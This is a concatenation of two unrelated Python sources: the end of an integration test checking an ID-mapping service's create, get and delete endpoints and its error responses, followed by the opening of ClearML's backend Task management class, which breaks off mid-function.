storage.create_namespace(pub)
storage.set_namespace_publicly_mappable(pub, True)
# create mappings
# test that the service ignores incorrect headers
r = requests.put('http://localhost:' + service_port + '/api/v1/mapping/priv/pub',
headers={'Authorization': 'local ' + lut.token,
'content-type': 'x-www-form-urlencoded'},
data=json.dumps({'id1': 'id2', 'id3': 'id4', 'id5': 'id6'}))
assert r.status_code == 204
# fail create mappings
r = requests.put('http://localhost:' + service_port + '/api/v1/mapping/priv/pub',
headers={'Authorization': 'focal ' + lut.token},
data=json.dumps({'id10': 'id11'}))
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50020,
'apperror': 'No such authentication source',
'message': '50020 No such authentication source: focal'
}
})
assert r.status_code == 404
# get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/pub?separate',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id2', 'id4', 'id8']}))
assert r.json() == {'id2': {'other': [{'ns': 'priv', 'id': 'id1'}], 'admin': []},
'id4': {'other': [{'ns': 'priv', 'id': 'id3'}], 'admin': []},
'id8': {'other': [], 'admin': []}
}
# fail get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/plub?separate',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id2', 'id4', 'id8']}))
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50010,
'apperror': 'No such namespace',
'message': "50010 No such namespace: ['plub']"
}
})
assert r.status_code == 404
# delete mappings
r = requests.delete('http://localhost:' + service_port + '/api/v1/mapping/priv/pub',
headers={'Authorization': 'local ' + lut.token,
'content-type': 'x-www-form-urlencoded'},
data=json.dumps({'id1': 'id7', 'id3': 'id4', 'id5': 'id6'}))
assert r.status_code == 204
# get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/pub',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id2', 'id4']}))
assert r.json() == {'id2': {'mappings': [{'ns': 'priv', 'id': 'id1'}]},
'id4': {'mappings': []}
}
# fail delete mappings
r = requests.delete('http://localhost:' + service_port + '/api/v1/mapping/pub/priv',
headers={'Authorization': 'local ' + lut.token,
'content-type': 'x-www-form-urlencoded'},
data=json.dumps({'id2': 'id1'}))
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 403,
'httpstatus': 'Forbidden',
'appcode': 20000,
'apperror': 'Unauthorized',
'message': ('20000 Unauthorized: User local/lu may not administrate ' +
'namespace pub')
}
})
assert r.status_code == 403
# test mapping to same namespace
r = requests.put('http://localhost:' + service_port + '/api/v1/mapping/priv/priv',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'id20': 'id21'}))
assert r.status_code == 204
# get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/priv?separate',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id1', 'id21', 'id20']}))
assert r.json() == {'id1': {'admin': [{'ns': 'pub', 'id': 'id2'}], 'other': []},
'id21': {'other': [{'ns': 'priv', 'id': 'id20'}], 'admin': []},
'id20': {'other': [], 'admin': [{'ns': 'priv', 'id': 'id21'}]}
}
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
import warnings
from copy import copy
from datetime import datetime
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, deferred_config, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR, DOCKER_BASH_SETUP_ENV_VAR
from ...utilities.process.mp import SingletonLock
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_ignore_requirements = set()
_store_diff = deferred_config('development.store_uncommitted_code_diff', False)
_store_remote_diff = deferred_config('development.store_code_diff_from_remote', False)
_report_subprocess_enabled = deferred_config('development.report_use_subprocess', sys.platform == 'linux')
_force_use_pip_freeze = deferred_config(multi=[('development.detect_with_pip_freeze', False),
('development.detect_with_conda_freeze', False)])
_force_store_standalone_script = False
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, minimum length of 3 characters, used only if a new task is created.
The new task will be associated with a project by this name. If no such project exists, a new project will
be created using the API.
:type project_name: str
:param task_name: Optional task name, minimum length of 3 characters, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
SingletonLock.instantiate()
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate(check_output_dest_credentials=False)
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=False):
if not self._is_remote_main_task():
self._storage_uri = self.get_output_destination(raise_on_error=False, log_on_error=False) or None
return
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log,
create_requirements=False,
check_uncommitted=self._store_diff,
uncommitted_from_remote=self._store_remote_diff,
force_single_script=self._force_store_standalone_script,
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if self._force_use_pip_freeze:
if isinstance(self._force_use_pip_freeze, (str, Path)):
conda_requirements = ''
req_file = Path(self._force_use_pip_freeze)
requirements = req_file.read_text() if req_file.is_file() else None
else:
requirements, conda_requirements = pip_freeze(
combine_conda_with_pip=config.get('development.detect_with_conda_freeze', True))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if isinstance(task_type, self.TaskTypes):
task_type = task_type.value
if task_type not in (self.TaskTypes.training.value, self.TaskTypes.testing.value) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type))
task_type = self.TaskTypes.training.value
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('execution.model', raise_on_error=False)
return {'Input Model': model_id} if model_id else {}
input_models = self._get_task_property('models.input', default=[]) or []
return {m.name: m.model for m in input_models}
@property
def output_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('output.model', raise_on_error=False)
return {'Output Model': model_id} if model_id else {}
output_models = self._get_task_property('models.output', default=[]) or []
return {m.name: m.model for m in output_models}
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated.
ClearML reloads the Task status information only, when this value is accessed.
return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, model_id=None):
# type: (bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or None,
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(
metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self)
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
# limit path to support various storage infrastructure limits (such as max path pn posix or object storage)
# project path limit to 256 (including subproject names), and task name limit to 128.
def limit_folder_name(a_name, uuid, max_length, always_add_uuid):
if always_add_uuid:
return '{}.{}'.format(a_name[:max(2, max_length-len(uuid)-1)], uuid)
if len(a_name) < max_length:
return a_name
return '{}.{}'.format(a_name[:max(2, max_length-len(uuid)-1)], uuid)
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(limit_folder_name(self.get_project_name(), str(self.project), 256, False),
limit_folder_name(self.name, str(self.data.id), 128, True),
extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True, force=False):
# type: (bool, bool) -> ()
"""
Reset the task. Task will be reloaded following a successful reset.
:param set_started_on_success: If True automatically set Task status to started after resetting it.
:param force: If not true, call fails if the task status is 'completed'
"""
self.send(tasks.ResetRequest(task=self.id, force=force))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False, status_reason=None):
# type: (bool, bool, Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.StoppedRequest(self.id, force=force, status_reason=status_reason),
ignore_errors=ignore_errors
)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
"""
.. note:: Deprecated, use mark_completed(...) instead
"""
warnings.warn("'completed' is deprecated; use 'mark_completed' instead.", DeprecationWarning)
return self.mark_completed(ignore_errors=ignore_errors)
def mark_completed(self, ignore_errors=True, status_message=None, force=False):
# type: (bool, Optional[str], bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(
tasks.CompletedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
return self.send(
tasks.StoppedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None, force=False):
# type: (bool, Optional[str], Optional[str], bool) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.FailedRequest(
task=self.id, status_reason=status_reason, status_message=status_message, force=force),
ignore_errors=ignore_errors,
)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) not in (str(tasks.TaskStatusEnum.stopped), str(tasks.TaskStatusEnum.completed)):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as it's output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if model was deleted or if this was the output model (which was already deleted
# by DeleteRequest, and it's URI is dangling
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
event_uris = list(filter(None, event_uris))
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
failures = list(filter(None, failures))
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(
self,
model_path, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
model_name=None, # type: Optional[str]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param model_path: A local weights file or folder to be uploaded.
If remote URI is provided (e.g. http:// or s3: // etc) then the URI is stored as is, without any upload
:param name: The updated model name.
If not provided, the name is the model weights file filename without the extension.
:param comment: The updated model description. (Optional)
:param tags: The updated model tags. (Optional)
:param model_name: If provided the model name as it will appear in the model artifactory. (Optional)
Default: Task.name - name
:param iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file.
Notice: upload is done is a background thread, while the function call returns immediately
"""
from ...model import OutputModel
output_model = OutputModel(
task=self,
name=model_name or ('{} - {}'.format(self.name, name) if name else self.name),
tags=tags,
comment=comment
)
output_model.connect(task=self, name=name)
url = output_model.update_weights(weights_filename=model_path, iteration=iteration)
return url
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(
self,
model_id=None,
model_name=None,
update_task_design=True,
update_task_labels=True,
name=None
):
# type: (str, Optional[str], bool, bool, Optional[str]) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name in the artifactory. The model_name is used to locate an existing model
in the **ClearML Server** (backend). If ``model_id`` is not specified,
then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
:param name: Model section name to be stored on the Task (unrelated to the model object name itself)
Default: the the model weight filename is used (excluding file extension)
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name and not model_id:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created', 'uri']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
name = name or Path(model.uri).stem
else:
# clear the input model
model = None
model_id = ''
name = name or 'Input Model'
with self._edit_lock:
self.reload()
# store model id
if Session.check_min_api_version("2.13"):
self.send(tasks.AddOrUpdateModelRequest(
task=self.id, name=name, model=model_id, type=tasks.ModelTypeEnum.input
))
else:
# backwards compatibility
self._set_task_property("execution.model", model_id, raise_on_error=False, log_on_error=False)
# Auto populate from model, if empty
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# API will makes sure we get old parameters with type legacy on top level (instead of nested in Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)):
if 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
elif any('\\' in str(v) for v in value):
try:
str_json = json.dumps(value)
return str_json
except TypeError:
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
